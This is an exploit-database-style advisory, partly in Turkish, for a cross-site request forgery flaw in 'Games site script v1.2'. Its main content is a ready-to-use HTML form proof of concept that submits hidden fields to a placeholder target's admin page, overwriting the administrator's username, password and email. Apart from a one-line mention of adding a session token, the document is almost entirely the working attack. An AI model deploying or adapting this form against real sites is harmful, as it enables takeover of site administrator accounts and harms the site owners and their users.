< ------------------- header data start ------------------- >

#############################################################

# Application Name : Games site script v1.2

# vulnerable Type : XSRF

# Infection : Admin sifresi degistirilebilir ..!

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir !

# Demo : http://games.sourceworkshop.com/admin/

# author : CWCaspeR ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form action=’http://hedefsite.com/admin/index.php’ method=POST>
<input type=’hidden’ name=’command’ value=’settings’>
<input type=’hidden’ name=’param’ value=’update’>
<input readonly value=’KULLANICIADI’ class=’field’ name=’admin_user_name’ type=hidden size=25>
<input readonly value=’SIFRE’ class=’field’ name=’admin_password’ type=hidden size=25>
<input readonly value=’[email protected]’ class=’field’ name=’admin_email’ type=hidden size=45>
<input value=’45’ class=’field’ name=’thubnail_width’ type=hidden size=5>
<input value=’45’ class=’field’ name=’thubnail_height’ type=hidden size=5>
<input name=’save’ value=’BUTONADI’ class=’button’ type=submit ></td></tr>
</form>

< -- bug code end of -- >